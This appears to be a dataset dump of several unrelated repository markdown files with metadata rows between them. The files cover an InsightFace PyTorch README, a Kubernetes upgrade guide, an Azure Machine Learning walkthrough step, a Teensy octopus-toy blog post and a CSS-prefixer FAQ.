pakketten die eerder op een notebook-VM zijn geïnstalleerd, moeten echter opnieuw worden geïnstalleerd op het reken exemplaar. Quota beperkingen, die van toepassing zijn op het maken van reken clusters, zijn ook van toepassing op het maken van reken instanties. Er kunnen geen nieuwe Vm's voor het notitie blok worden gemaakt. U kunt echter nog steeds toegang krijgen tot en gebruikmaken van de laptop-Vm's die u hebt gemaakt, met volledige functionaliteit. Reken instanties kunnen worden gemaakt in dezelfde werk ruimte als de bestaande virtuele machines van het werk blok. ## <a name="next-steps"></a>Volgende stappen * [Zelf studie: uw eerste ml-model trainen](tutorial-1st-experiment-sdk-train.md) laat zien hoe u een reken instantie met een geïntegreerde notebook kunt gebruiken.
79.718182
913
0.797411
nld_Latn
0.999368
6f5b24d6385f47fdd34a75d03acb9f58c3a3c55f
5,127
md
Markdown
README.md
lianghongkey/InsightFace
0232bbe32e3cb799fcaedea3ef4b6885f40001d3
[ "MIT" ]
2
2018-12-23T03:55:40.000Z
2018-12-24T02:14:36.000Z
README.md
lianghongkey/InsightFace
0232bbe32e3cb799fcaedea3ef4b6885f40001d3
[ "MIT" ]
null
null
null
README.md
lianghongkey/InsightFace
0232bbe32e3cb799fcaedea3ef4b6885f40001d3
[ "MIT" ]
null
null
null
# InsightFace_Pytorch Pytorch0.4.1 codes for InsightFace - - - ## 1. Intro * This repo is a reimplementation of Arcface[(paper)](https://arxiv.org/abs/1801.07698), or Insightface[(github)](https://github.com/deepinsight/insightface) * For models, including the pytorch implementation of the backbone modules of Arcface and MobileFacenet * Codes for transform MXNET data records in Insightface[(github)](https://github.com/deepinsight/insightface) to Image Datafolders are provided * Pretrained models are posted, include the [MobileFacenet](https://arxiv.org/abs/1804.07573) and IR-SE50 in the original paper - - - ## 2. Pretrained Models & Performance [IR-SE50 @ BaiduNetdisk](https://pan.baidu.com/s/12BUjjwy1uUTEF9HCx5qvoQ), [IR-SE50 @ Onedrive](https://1drv.ms/u/s!AhMqVPD44cDOhkPsOU2S_HFpY9dC) | LFW(%) | CFP-FF(%) | CFP-FP(%) | AgeDB-30(%) | calfw(%) | cplfw(%) | vgg2_fp(%) | | ------ | --------- | --------- | ----------- | ------------- | ------------- | ------------- | | 0.9952 | 0.9962 | 0.9504 | 0.9622 | 0.9557 | 0.9107 | 0.9386 | [Mobilefacenet @ BaiduNetDisk](https://pan.baidu.com/s/1hqNNkcAjQOSxUjofboN6qg), [Mobilefacenet @ OneDrive](https://1drv.ms/u/s!AhMqVPD44cDOhkSMHodSH4rhfb5u) | LFW(%) | CFP-FF(%) | CFP-FP(%) | AgeDB-30(%) | calfw(%) | cplfw(%) | vgg2_fp(%) | | ------ | --------- | --------- | ----------- | ------------- | ------------- | ------------- | | 0.9918 | 0.9891 | 0.8986 | 0.9347 | 0.9402 | 0.866 | 0.9100 | ## 3. How to use * clone ``` git clone https://github.com/TropComplique/mtcnn-pytorch.git ``` ### 3.1 Data Preparation #### 3.1.1 Prepare Facebank (For testing over camera or video) Provide the face images your want to detect in the data/face_bank folder, and guarantee it have a structure like following: ``` data/facebank/ ---> id1/ ---> id1_1.jpg ---> id2/ ---> id2_1.jpg ---> id3/ ---> id3_1.jpg ---> id3_2.jpg ``` #### 3.1.2 download the pretrained model to work_space/model If more than 1 image appears in one folder, an average embedding will be calculated #### 3.2.3 Prepare Dataset ( For training) download the refined dataset from original post: (emore recommended) * [Refined-MS1M@BaiduDrive](https://pan.baidu.com/s/1nxmSCch), [Refined-MS1M@GoogleDrive](https://drive.google.com/file/d/1XRdCt3xOw7B3saw0xUSzLRub_HI4Jbk3/view) * [VGGFace2@BaiduDrive](https://pan.baidu.com/s/1c3KeLzy), [VGGFace2@GoogleDrive](https://drive.google.com/open?id=1KORwx_DWyIScAjD6vbo4CSRu048APoum) * [emore dataset @ BaiduDrive](https://pan.baidu.com/s/1c3KeLzy), [emore dataset @ OneDrive](https://pan.baidu.com/s/1c3KeLzy) **Note:** If you use the refined [MS1M](https://arxiv.org/abs/1607.08221) dataset and the cropped [VGG2](https://arxiv.org/abs/1710.08092) dataset, please cite the original papers. * after unzip the files to 'data' path, run : ``` python prepare_data.py ``` after the execution, you should find following structure: ``` faces_emore/ ---> agedb_30 ---> calfw ---> cfp_ff ---> cfp_fp ---> cfp_fp ---> cplfw --->imgs ---> lfw ---> vgg2_fp ``` - - - ### 3.2 detect over camera: * 1. download the desired weights to model folder: - [IR-SE50 @ BaiduNetdisk](https://pan.baidu.com/s/12BUjjwy1uUTEF9HCx5qvoQ) - [IR-SE50 @ Onedrive](https://1drv.ms/u/s!AhMqVPD44cDOhkPsOU2S_HFpY9dC) - [Mobilefacenet @ BaiduNetDisk](https://pan.baidu.com/s/1hqNNkcAjQOSxUjofboN6qg) - [Mobilefacenet @ OneDrive](https://1drv.ms/u/s!AhMqVPD44cDOhkSMHodSH4rhfb5u) * 2 to take a picture, run ``` python take_pic.py -n name ``` press q to take a picture, it will only capture 1 highest possibility face if more than 1 person appear in the camera * 3 or you can put any preexisting photo into the facebank directory, the file structure is as following: ``` - facebank/ name1/ photo1.jpg photo2.jpg ... name2/ photo1.jpg photo2.jpg ... ..... if more than 1 image appears in the directory, average embedding will be calculated ``` - 4 to start ``` python face_verify.py ``` - - - ### 3.3 detect over video: ``` python infer_on_video.py -f [video file name] -s [save file name] ``` the video file should be inside the data/face_bank folder - Video Detection Demo [@Youtube](https://www.youtube.com/watch?v=6r9RCRmxtHE) ### 3.4 Training: ``` python train.py -b [batch_size] -lr [learning rate] -e [epochs] # python train.py -net mobilefacenet -b 200 -w 4 ``` ## 4. References * This repo is mainly inspired by [deepinsight/insightface](https://github.com/deepinsight/insightface) and [InsightFace_TF](https://github.com/auroua/InsightFace_TF) ## PS * PRs are welcome, in case that I don't have the resource to train some large models like the 100 and 151 layers model * Email : treb1en@qq.com
41.016
180
0.622001
eng_Latn
0.553023
6f5b4feb7006d8e82b114c1521697b7df6ad3b69
2,782
md
Markdown
data/README.md
christnp/e6895-project
5aea40dee0caadf077bdd1370acf13e0f6e26f65
[ "MIT" ]
null
null
null
data/README.md
christnp/e6895-project
5aea40dee0caadf077bdd1370acf13e0f6e26f65
[ "MIT" ]
null
null
null
data/README.md
christnp/e6895-project
5aea40dee0caadf077bdd1370acf13e0f6e26f65
[ "MIT" ]
null
null
null
# Tips for data collection ## Google Bucket Most data is stored as a CSV file in a Google Bucket. The code has been devloped such that the data is stored as a signle CSV file ratehr than multiple CSV files (i.e., we use .repartition(1) to bring all data to single worker). This makes it much easier to postprocess the data. The first step is to get the data from the target bucket. This can easily be done from your local development machine using the `gsutil` function. For example, if I'm trying to copy the CSV files stored in my `_multilayer` output directory to my current path, I'd simply type the following in the terminal: ``` gsutil -m cp -r gs://eecs-e6895-bucket/output/_multilayer/20200514095202/* . ``` Now that the data is copied to your local machine, you will notice that the actual CSV file is located beneath a subdirectory that has the name as identified in the code. That is, if I tell my code to store the data as 'imafile.csv' then the data in the bucket would actually be saved as `imafile.csv/123abc456xyz.csv'. This is very standard for Google Dataproc, but is not necessarily how I like to view my data -- so I wrote a python script that recursively goes through every directory ending with `.csv`, copies the name of the subdirectory and renames the file (with a prefix) accordingly, moves the file out of the subdirectory, removes the subdirectory, removes the prefix from the file. Bingo! ```python files_in_path = os.listdir(self.csv_path) csv_paths = [] for file in files_in_path: if file.endswith(".csv"): csv_paths.append(os.path.join(self.csv_path, file)) for path in csv_paths: name = os.path.basename(path) try: for file in os.listdir(path): if file.endswith(".csv"): os.rename(os.path.join(path, file), os.path.join(self.csv_path, "moved_"+name)) except Exception as e: print("Failed to rename file in path {}: {}".format(path,e)) for file in files_in_path: file_path = os.path.join(self.csv_path,file) if file.endswith(".csv"): if not file.startswith("moved_"): try: shutil.rmtree(file_path) except Exception as e: print("Failed to remove direcotry {}: {}".format(file_path,e)) if file.startswith("moved_"): try: os.rename(file_path, file_path.replace('moved_', '')) except Exception as e: print("Failed rename file {}: {}".format(file_path,e)) ``` \* sorry it's not commented and it could probably by a lot more 'pythonic'
48.807018
103
0.643422
eng_Latn
0.994457
6f5be2740124fdd90e74d2f78c8c0438550e1347
1,356
md
Markdown
README.md
robiveli/tabsy-css
01251687b1f9af76b33e2112df896c472b892987
[ "MIT" ]
15
2017-07-16T20:28:11.000Z
2021-08-09T16:47:53.000Z
README.md
robiveli/tabsy-css
01251687b1f9af76b33e2112df896c472b892987
[ "MIT" ]
1
2021-02-17T01:54:23.000Z
2021-02-18T16:42:56.000Z
README.md
robiveli/tabsy-css
01251687b1f9af76b33e2112df896c472b892987
[ "MIT" ]
6
2018-11-27T21:32:25.000Z
2021-04-30T18:46:08.000Z
# Tabsy CSS # ## Simple tabs toggler component written in pure CSS with no dependencies ## ### Install ### With npm: ```sh npm install tabsy-css ``` With Bower: ```sh bower install tabsy-css ``` ### Usage ### Include css: ```sh <link href='tabsy.css' rel='stylesheet' type='text/css'> ``` Initial required structure, place any content you want within the tabs: ```sh <div class="tabsy"> <input type="radio" id="tab1" name="tab" checked> <label class="tabButton" for="tab1">Tab One</label> <div class="tab"> <div class="content"> Content One </div> </div> <input type="radio" id="tab2" name="tab" checked> <label class="tabButton" for="tab2">Tab Two</label> <div class="tab"> <div class="content"> Content Two </div> </div> <input type="radio" id="tab3" name="tab" checked> <label class="tabButton" for="tab3">Tab Three</label> <div class="tab"> <div class="content"> Content Three </div> </div> </div> ``` ### Demo ### Demo available [here](http://robiveli.github.io/tabsy-css/). ### Options ### Default css settings are placed in `library/_variables.scss`: ### Note ### Based on Flexbox feature. Where not supported simple fallback is applied. ### License ### Tabsy CSS is licensed under the [MIT license](http://opensource.org/licenses/MIT).
20.545455
82
0.628319
eng_Latn
0.679552
6f5bf0d102d8423e9508cd71967b0af34729afd2
857
md
Markdown
DataStructure/LinearStructure/String/CountingLetters/LC387FirstUniqueCharacterInString.md
wtsanshou/Coding
451738297f7249fe8a12849d7dcacda0095bc2e9
[ "RSA-MD" ]
16
2019-07-26T14:40:28.000Z
2022-02-17T01:26:44.000Z
DataStructure/LinearStructure/String/CountingLetters/LC387FirstUniqueCharacterInString.md
wtsanshou/Coding
451738297f7249fe8a12849d7dcacda0095bc2e9
[ "RSA-MD" ]
null
null
null
DataStructure/LinearStructure/String/CountingLetters/LC387FirstUniqueCharacterInString.md
wtsanshou/Coding
451738297f7249fe8a12849d7dcacda0095bc2e9
[ "RSA-MD" ]
6
2020-05-06T17:14:14.000Z
2021-09-23T06:51:48.000Z
# LC387. First Unique Character in a String ### LeetCode ## Question Given a string, find the first non-repeating character in it and return it's index. If it doesn't exist, return -1. **Examples:** ``` s = "leetcode" return 0. s = "loveleetcode", return 2. ``` **Note:** You may assume the string contain only lowercase letters. ## Solutions ### Solution 1 * C++ (42ms) ``` int firstUniqChar(string s) { int count[128] = {0}; for(char c : s) count[c]++; for(int i=0; i<s.length(); ++i) if(count[s[i]] == 1) return i; return -1; } ``` Using a map `count` to remember the number of each letter in `s`. Travesal the string `s` again, the first letter with count `1` is the result. **Complexity:** * **worst-case time complexity:** `O(n)`, where `n` is the length of `s`. * **worst-case space complexity:** `O(1)`.
19.477273
115
0.624271
eng_Latn
0.978982
6f5c86da1fbb269acbaaa77d81510c53c2f8e5f4
4,798
md
Markdown
Documentation/kubernetes-upgrade.md
tangfeixiong/coreos-kubernetes
36261b4819b65314405f9e3e373a279c4775f8a3
[ "Apache-2.0" ]
1
2016-08-18T09:02:36.000Z
2016-08-18T09:02:36.000Z
Documentation/kubernetes-upgrade.md
tangfeixiong/coreos-kubernetes
36261b4819b65314405f9e3e373a279c4775f8a3
[ "Apache-2.0" ]
null
null
null
Documentation/kubernetes-upgrade.md
tangfeixiong/coreos-kubernetes
36261b4819b65314405f9e3e373a279c4775f8a3
[ "Apache-2.0" ]
null
null
null
# Upgrading Kubernetes This document describes upgrading the Kubernetes components on a cluster's master and worker nodes. For general information on Kubernetes cluster management, upgrades (including more advanced topics such as major API version upgrades) see the [Kubernetes upstream documentation](http://kubernetes.io/v1.1/docs/admin/cluster-management.html) and [version upgrade notes](http://kubernetes.io/v1.1/docs/design/versioning.html#upgrades) **NOTE:** The following upgrade documentation is for installations based on the CoreOS + Kubernetes step-by-step [installation guide](https://coreos.com/kubernetes/docs/latest/getting-started.html). Upgrade documentation for the AWS cloud-formation based installation is forthcoming. ## Upgrading the Kubelet The Kubelet runs on both master and worker nodes, and the binary ships as part of the CoreOS image. As the host OS is updated, the Kubelet will be upgraded as well. This step will not be covered in the guides below, however, more information can be found in the [CoreOS Updates Documentation](https://coreos.com/using-coreos/updates) To run a custom version of the kubelet, modify the kubelet service file on each node (`/etc/systemd/system/kubelet.service`) to contain the path to the custom kubelet binary. ## Upgrading Master Nodes Master nodes consist of the following Kubernetes components: * kube-proxy * kube-apiserver * kube-controller-manager * kube-scheduler * kube-podmaster (high-availability) While upgrading the master components, user pods on worker nodes will continue to run normally. ### Upgrading kube-apiserver and kube-proxy Both the kube-apiserver and kube-proxy are run as "static pods". This means the pod definition is a file on disk (default location: `/etc/kubernetes/manifests`). To update these components, you simply need to update the static manifest file. When the manifest changes on disk, the kubelet will pick up the changes and restart the local pod. For example, to upgrade the kube-apiserver version you could update the pod image tag in `/etc/kubernetes/manifests/kube-apiserver.yaml`: From: `image: gcr.io/google_containers/hyperkube:v1.0.6` To: `image: gcr.io/google_containers/hyperkube:v1.0.7` The kubelet would then restart the pod, and the new image version would be used. **NOTE:** If you are running a multi-master high-availabililty cluster, please see the next section on upgrading the remaining master node components. Otherwise you can upgrade the remaining static pods (controller-manager, scheduler) using the same process described above. ### Upgrading Remaining Master Node Components (High-Availability) The kube-controller-manager, kube-scheduler, and kube-podmaster are all also deployed as static pods in `/etc/kubernetes/manifests`. However, in high-availability deployments, the kube-podmaster is responsible for making sure only a single copy of the controller-manager and scheduler are running cluster-wide. To accomplish this the kube-podmaster on each master node, if leader-elected, will copy the static manifest from `/srv/kubernetes/manifests` into `/etc/kubernetes/manifests` and the kubelet will pick up the manifest and run the pod. If the kube-podmaster loses its status as leader, it will remove the static pod from `/etc/kubernetes/manifests/` and the kubelet will shut down the pod. This configuration means upgrading of these components will take a little more coordination. To upgrade the kube-controller-manager and kube-scheduler: 1. For each master node: 1. Make changes to the base manifests in `/srv/kubernetes/manifests` 1. Remove the existing manifests (if present) from `/etc/kubernetes/manifests` 1. The kube-podmaster will automatically fetch the new manifest from `/srv/kubernetes/manifests` and copy it to `/etc/kubernetes/manifests` and the new pod will be started. **NOTE:** Because a particular master node may not be elected to run a particular component (e.g. kube-scheduler), updating the local manifest may not update the currently active instance of the Pod. You should update the manifests on all master nodes to ensure that no matter which is active, all will reflect the updated manifest. ### Upgrading Worker Nodes Worker nodes will consist of the following kubernetes components. * kube-proxy ### Upgrading the kube-proxy The kube-proxy is run as a "static pod". To upgrade the pod definition, simply modify the pod manifest located in `/etc/kubernetes/manifests/kube-proxy.yaml`. The kubelet will pick up the changes and re-launch the kube-proxy pod. ## Example Upgrade Process: 1. Prepare new pod manifests for master nodes 1. Prepare new pod manifests for worker nodes 1. For each master node: 1. Back up existing manifests 1. Update manifests 1. Repeat item 3 for each worker node
65.726027
432
0.792205
eng_Latn
0.985174
6f5ceda90b87a1ca5c9fea312a88ea947fd4facb
18
md
Markdown
java/j4/README.md
claviering/code
7019d50ff2e390696bc60358d1e39d9112f332e0
[ "WTFPL" ]
1
2017-12-16T13:55:04.000Z
2017-12-16T13:55:04.000Z
java/j4/README.md
claviering/code
7019d50ff2e390696bc60358d1e39d9112f332e0
[ "WTFPL" ]
1
2021-09-03T03:00:17.000Z
2021-09-03T03:00:17.000Z
java/j4/README.md
claviering/code
7019d50ff2e390696bc60358d1e39d9112f332e0
[ "WTFPL" ]
1
2016-12-19T16:35:13.000Z
2016-12-19T16:35:13.000Z
# P118-6 # P180-6
6
8
0.555556
vie_Latn
0.820815
6f5d2bc8446aa06fad7550e225d933d34dcc6311
892
md
Markdown
packages/lambda/CHANGELOG.md
myrmex-org/myrmex
9dba3b8686d87bd603779b00c0545cd12ccad43c
[ "MIT" ]
16
2017-07-07T23:38:23.000Z
2020-10-26T10:02:03.000Z
packages/lambda/CHANGELOG.md
myrmex-org/myrmex
9dba3b8686d87bd603779b00c0545cd12ccad43c
[ "MIT" ]
13
2017-06-29T18:14:58.000Z
2019-04-07T18:14:25.000Z
packages/lambda/CHANGELOG.md
myrmex-org/myrmex
9dba3b8686d87bd603779b00c0545cd12ccad43c
[ "MIT" ]
2
2018-05-19T17:48:09.000Z
2018-09-19T21:50:51.000Z
# Change Log All notable changes to this project will be documented in this file. See [standard-version](https://github.com/conventional-changelog/standard-version) for commit guidelines. <a name="0.3.0"></a> # [0.3.0](https://github.com/myrmex-org/myrmex/compare/@myrmex/lambda@0.2.3...@myrmex/lambda@0.3.0) (2017-07-06) ### Features * **lambda:** improve lambda execution messages and python3 execution ([0acc2a9](https://github.com/myrmex-org/myrmex/commit/0acc2a9)) <a name="0.2.3"></a> ## [0.2.3](https://github.com/myrmex-org/myrmex/compare/@myrmex/lambda@0.2.2...@myrmex/lambda@0.2.3) (2017-07-04) <a name="0.2.2"></a> ## [0.2.2](https://github.com/myrmex-org/myrmex/compare/@myrmex/lambda@0.2.1...@myrmex/lambda@0.2.2) (2017-07-04) <a name="0.2.1"></a> ## [0.2.1](https://github.com/myrmex-org/myrmex/compare/@myrmex/lambda@0.2.0...@myrmex/lambda@0.2.1) (2017-06-30)
28.774194
134
0.681614
yue_Hant
0.088689
6f5f3b772988efec39e114a8193b30898c52975b
6,373
markdown
Markdown
_posts/2013/2013-06-17-teensy-moonica-the-8-legged-gift-for-a-developer.markdown
anroots/sqroot.eu
50a9e899aa215aa9eda9abc4741ea0edc4b901f6
[ "Apache-2.0" ]
null
null
null
_posts/2013/2013-06-17-teensy-moonica-the-8-legged-gift-for-a-developer.markdown
anroots/sqroot.eu
50a9e899aa215aa9eda9abc4741ea0edc4b901f6
[ "Apache-2.0" ]
4
2019-10-21T12:58:58.000Z
2019-10-21T12:58:59.000Z
_posts/2013/2013-06-17-teensy-moonica-the-8-legged-gift-for-a-developer.markdown
anroots/sqroot.eu
50a9e899aa215aa9eda9abc4741ea0edc4b901f6
[ "Apache-2.0" ]
1
2016-09-18T20:02:24.000Z
2016-09-18T20:02:24.000Z
--- title: Teensy Moonica, The 8-Legged Gift for A Developer category: Projects tags: - python - c# - project - electronics - circuit - teensy - microcontroller - usb comments: - id: 2687 author: Katrin author_email: loodus.katrin@gmail.com author_url: '' date: '2013-06-17 12:39:02 +0300' date_gmt: '2013-06-17 09:39:02 +0300' content: "Übernunnu!\r\n\r\nIt looks really adorable and I'm pretty sure it can be a very useful tool also for IT system administrators... So good work and I hope that Moonica has won the heart of its new owner and of course the heart of other octopus-electronics-lovers! :) \r\n\r\nAnd a little message from the EIK robotics club (HAL vol 2):\"We hope to see you here again with your new cool projects as well! :)\"" --- A <a href="http://waher.net">good friend of mine</a> had a birthday coming up and I found myself socially obligated to do something about that. The idea - use my skills as a developer to <a href="http://makershed.com">MAKE</a> something developer-ish. This was a collaborative project with <a href="http://sokeri.org/">Valeria</a>. <blockquote> I buy more things than I make. I used to think it was a sign of some kind of capitalistic progress to be able to buy food and gifts instead of making them myself, but I’m not sure anymore. When it comes to difference making there is a different trend line. Money can come and go, but my time on this planet is finite. How I spend my time, or who I spend it with means more than anything else in my universe. From at least the selfish view, giving my time is the most valuable gift I can give.<br /> <a href="http://scottberkun.com/essays/49-how-to-make-a-difference/">Scott Berkun, essay #49 - How to make a difference</a> </blockquote> <h1>Idea</h1> Build hardware that can interface with a computer (via the USB port) and send input commands to the PC that can be detected and processed. As a bonus, include output devices such as LED-s that could be activated from code. The idea came from the fact that I found myself typing PHPUnit commands for different test suites manually way too often. Wouldn't it be great to activate a test suite with a press of a button and have a green LED light up when everything is done? (or a red on in case of a failure). "Normal" people would go "???" about this, but trust me, for a developer, this is good stuff. ![UI draft]({{ site.url }}/content/2013/06/ui-draft.jpg) I came up with a rectangular-shaped control panel. Really fancy stuff, like you see in sci-fi movies or airplanes. Excited, I got in touch with a mutual friend who also happens to be a designer. A brainstorming session and a couple of hours later and the original idea had been morphed into a much cuddlier version - a USB soft toy. The toy would be an octopus with eight legs, each leg would act as a switch. I was to build the electronics innards while she'd do the sewing part. <h2>Parts</h2> <ul> <li><a href="http://www.pjrc.com/teensy/index.html">Teensy 2.0 Microcontroller (with pins)</a></li> <li><a href="http://uk.farnell.com/te-connectivity-amp/1-215297-6/socket-vertical-1row-16way/dp/3419174?Ntt=1-215297-6">1-215297-6 Socket</a></li> <li>2x RGB LED</li> <li><a href="http://www.adafruit.com/products/1010">8x pushbuttons</a></li> <li>1x Piezo Buzzer</li> <li>6x 960R resistors for the LED-s</li> <li>Some wire for connecting the components</li> <li><a href="http://www.oomipood.ee/en/product/cable-161/cable-161-usb-2-0-cable-a-male-mini-usb">Mini USB cable for the Teensy</a></li> <li>Heat-shrink tubing in different sizes</li> </ul> <h2>Tools</h2> <ul> <li>Adjustable temperature soldering iron and solder, solder paste</li> <li>Hot air gun for the heat shrink</li> <li>Wire-handling tools: pliers, strippers, clippers</li> <li>Digital multimeter</li> <li>Breadboard and jumpers for prototyping</li> <li>Helping Hands</li> </ul> <h1>The Build</h1> ![Breadboard]({{ site.url }}/content/2013/06/build.jpg) Prototyping was quite fast. This was my first bigger build and I had to figure out how to use PWM to control the buzzer and LED brightness. In no time at all, the circuit was assembled on my breadboard. I used the equipment of the robotics lab of EIK to assemble and solder the circuit. Software was a bit trickier. A lot of hours went into refactoring and documentation. The most complex part was serial communication. Initially, I tried to be verbose, sending button events as long strings ("Button 1 pressed") and parsing the string in Python. Then I saw <a href="http://www.youtube.com/watch?v=Cy9MIoG5z4s">Saying a Lot with Very Little (Arduino Digital Input to Python</a> and refactored the code to send all button states as one byte - much more efficient way of communication. <h2>Oops!</h2> We - me and Val - had hacking evenings on several occasions. During the last one, an accident happened. It turns out that the contacts of microswitches are actually quite fragile (go figure) and do not like to be abused. I managed to break one of the already assembled switches which meant no joy for that evening. All of the switches needed replacement by a stronger version (and also where the solder connections were made at a correct angle to begin with). Adafruit's tactile square buttons fit the build and replaced the less durable buttons. <h1>Finale</h1> Moonica - the name of our animal - was stuffed and wrapped and given to the birthday boy (although by the time the project was finished the actual birthday was two months into the past). ![Moonica]({{ site.url }}/content/2013/06/moonica.jpg) The project was great fun to do and also taught us a lot. I got into electronics in January 2013 and this was the first "official", non-prototype build. I learned to program in C / Arduino, got to try out PWM and implement serial interfacing. <iframe width="560" height="315" src="http://www.youtube.com/embed/a_wgeVvpjbw" frameborder="0" allowfullscreen></iframe> <h1>Links</h1> <ul> <li><a href="https://plus.google.com/photos/110367256187822089038/albums/5889699940176485425">Build photos</a></li> <li><a href="http://www.youtube.com/watch?v=a_wgeVvpjbw&amp;feature=youtu.be">Project video on YouTube</a></li> <li><a href="https://www.circuitlab.com/circuit/s6dr46/teensy-moonica/">Schematic</a></li> <li><a href="https://github.com/anroots/teensy-moonica">Source code</a></li> </ul>
64.373737
546
0.748313
eng_Latn
0.993633
6f60537563c9645e8877cb42e2022ea44ae1a285
3,751
md
Markdown
articles/machine-learning/machine-learning-walkthrough-1-create-ml-workspace.md
diablo444/azure-docs.de-de
168079679b8171e6c2b6957d21d581f05752689d
[ "CC-BY-4.0", "MIT" ]
null
null
null
articles/machine-learning/machine-learning-walkthrough-1-create-ml-workspace.md
diablo444/azure-docs.de-de
168079679b8171e6c2b6957d21d581f05752689d
[ "CC-BY-4.0", "MIT" ]
null
null
null
articles/machine-learning/machine-learning-walkthrough-1-create-ml-workspace.md
diablo444/azure-docs.de-de
168079679b8171e6c2b6957d21d581f05752689d
[ "CC-BY-4.0", "MIT" ]
1
2022-01-21T14:22:47.000Z
2022-01-21T14:22:47.000Z
--- title: 'Schritt 1: Erstellen eines Machine Learning-Arbeitsbereichs | Microsoft Docs' description: "Exemplarische Vorgehensweise zum Entwickeln einer Vorhersagelösung – Schritt 1: Erfahren Sie, wie Sie einen neuen Azure Machine Learning Studio-Arbeitsbereich einrichten." services: machine-learning documentationcenter: author: garyericson manager: jhubbard editor: cgronlun ms.assetid: b3c97e3d-16ba-4e42-9657-2562854a1e04 ms.service: machine-learning ms.workload: data-services ms.tgt_pltfrm: na ms.devlang: na ms.topic: article ms.date: 03/23/2017 ms.author: garye translationtype: Human Translation ms.sourcegitcommit: 4f2230ea0cc5b3e258a1a26a39e99433b04ffe18 ms.openlocfilehash: 8ca42ef8f5314866301f5c9e93caa90dc837a66e ms.lasthandoff: 03/25/2017 --- # <a name="walkthrough-step-1-create-a-machine-learning-workspace"></a>Exemplarische Vorgehensweise, Schritt 1: Erstellen eines Machine Learning-Arbeitsbereichs Dies ist der erste Schritt der exemplarischen Vorgehensweise zum [Entwickeln einer Predictive Analytics-Lösung mit Azure Machine Learning](machine-learning-walkthrough-develop-predictive-solution.md). 1. **Erstellen eines Machine Learning-Arbeitsbereichs** 2. [Hochladen vorhandener Daten](machine-learning-walkthrough-2-upload-data.md) 3. [Erstellen eines neuen Experiments](machine-learning-walkthrough-3-create-new-experiment.md) 4. [Trainieren und Bewerten der Modelle](machine-learning-walkthrough-4-train-and-evaluate-models.md) 5. [Bereitstellen des Webdiensts](machine-learning-walkthrough-5-publish-web-service.md) 6. [Zugreifen auf den Webdienst](machine-learning-walkthrough-6-access-web-service.md) - - - <!-- This needs to be updated to refer to the new way of creating workspaces in the Ibiza portal --> Um Machine Learning Studio verwenden zu können, benötigen Sie einen Microsoft Azure Machine Learning-Arbeitsbereich. Dieser Arbeitsbereich enthält die Tools, die zum Erstellen, Verwalten und Veröffentlichen von Experimenten erforderlich sind. <!-- ## To create a workspace 1. Sign in to the [Azure classic portal](https://manage.windowsazure.com). 2. In the Azure services panel, click **MACHINE LEARNING**. ![Create workspace][1] 3. Click **CREATE AN ML WORKSPACE**. 4. On the **QUICK CREATE** page, enter your workspace information and then click **CREATE AN ML WORKSPACE**. --> Der Administrator für Ihr Azure-Abonnement muss den Arbeitsbereich erstellen und Sie dann als Besitzer oder Mitwirkenden hinzufügen. Details finden Sie unter [Erstellen und Freigeben eines Azure Machine Learning-Arbeitsbereichs](machine-learning-create-workspace.md). Nachdem Ihr Arbeitsbereich erstellt wurde, öffnen Sie Machine Learning Studio ([https://studio.azureml.net/Home](https://studio.azureml.net/Home)). Wenn Sie über mehrere Arbeitsbereiche verfügen, können Sie den Arbeitsbereich im Fenster oben rechts auf der Symbolleiste auswählen. ![Auswählen eines Arbeitsbereichs in Studio][2] > [!TIP] > Wenn Sie als Besitzer des Arbeitsbereichs hinzugefügt wurden, können Sie die Experimente, an denen Sie arbeiten, mit anderen Personen teilen, indem Sie sie zum Arbeitsbereich einladen. Dies können Sie in Machine Learning Studio auf der Seite **EINSTELLUNGEN** vornehmen. Sie benötigen nur das Microsoft-Konto oder Organisationskonto des betreffenden Benutzers. > > Klicken Sie auf der Seite **EINSTELLUNGEN** auf **BENUTZER** und dann unten in Fenster auf **INVITE MORE USERS** (WEITERE BENUTZER EINLADEN). > > - - - **Nächster Schritt: [Hochladen vorhandener Daten](machine-learning-walkthrough-2-upload-data.md)** [1]: ./media/machine-learning-walkthrough-1-create-ml-workspace/create1.png [2]: ./media/machine-learning-walkthrough-1-create-ml-workspace/open-workspace.png
55.985075
362
0.796321
deu_Latn
0.878121
6f60e9e394e1d24664ec80f859bfa12f609876a4
2,095
md
Markdown
node_modules/inline-style-prefixer/docs/FAQ.md
variablemayank/mathquill-keypad
cfd6b3ff74081824f23e9c816078d12eeeecbcbb
[ "MIT" ]
null
null
null
node_modules/inline-style-prefixer/docs/FAQ.md
variablemayank/mathquill-keypad
cfd6b3ff74081824f23e9c816078d12eeeecbcbb
[ "MIT" ]
2
2020-04-30T13:37:47.000Z
2021-09-02T16:16:34.000Z
node_modules/inline-style-prefixer/docs/FAQ.md
variablemayank/mathquill-keypad
cfd6b3ff74081824f23e9c816078d12eeeecbcbb
[ "MIT" ]
5
2019-12-18T09:10:32.000Z
2020-02-24T09:33:49.000Z
# FAQ 1. [How can I disable the warnings?](#1-disable-warnings) (for tests) 2. [How can I do server-side rendering?](#2-server-side-rendering) 3. [Why is my userAgent not supported?](#3-unsupported-useragent) 4. [Why do some Cordova apps & in-app browser have issues?](#4-cordova-apps--in-app-browser) ## 1. Disable warnings If you're running tests and wan't to get rid of the warnings you might need set a `global.navigator` and pass a **valid** userAgent which gets validated correctly e.g. ```javascript // Chrome 49 userAgent global.navigator = {userAgent: 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2454.85 Safari/537.36'} ``` ([Radium's FAQ reference](https://github.com/FormidableLabs/radium/tree/master/docs/faq#how-can-i-get-rid-of-useragent-warnings-in-tests)) ## 2. Server-side rendering Doing server-side rendering there also is no `window.navigator` which can be used by default. You need to pass a valid `userAgent` (preferable taken from the `request headers` itself) to the prefixer instance. ## 3. Unsupported userAgent If you still get the warning even if using a valid `userAgent` the issue's most likely caused by [bowser](https://github.com/ded/bowser) which is the browser detection library this prefixer is built on. In most cases bowser fails to detect the correct browser information. To check if that's the case simply use this snippet: ```javascript console.log(new Prefixer()._browserInfo) ``` ## 4. Cordova apps & in-app browser We have seen different issues with [Cordova](https://cordova.apache.org)-based mobile applications as well as several in-app browsers. This is due to their userAgent which differs from default ones.<br> This especially occured on iOS 8.4.x. <br> For **Cordova/Phonegap** there is a method of changing the userAgent. I'd suggest one that gets recognized by bowser. ```xml <preference name="OverrideUserAgent" value="/* userAgent */" /> ``` For both I also recommend enabling the `keepUnprefixed` option. > I hope that we will be able to support those out of the box as soon as possible.
61.617647
325
0.756086
eng_Latn
0.984828
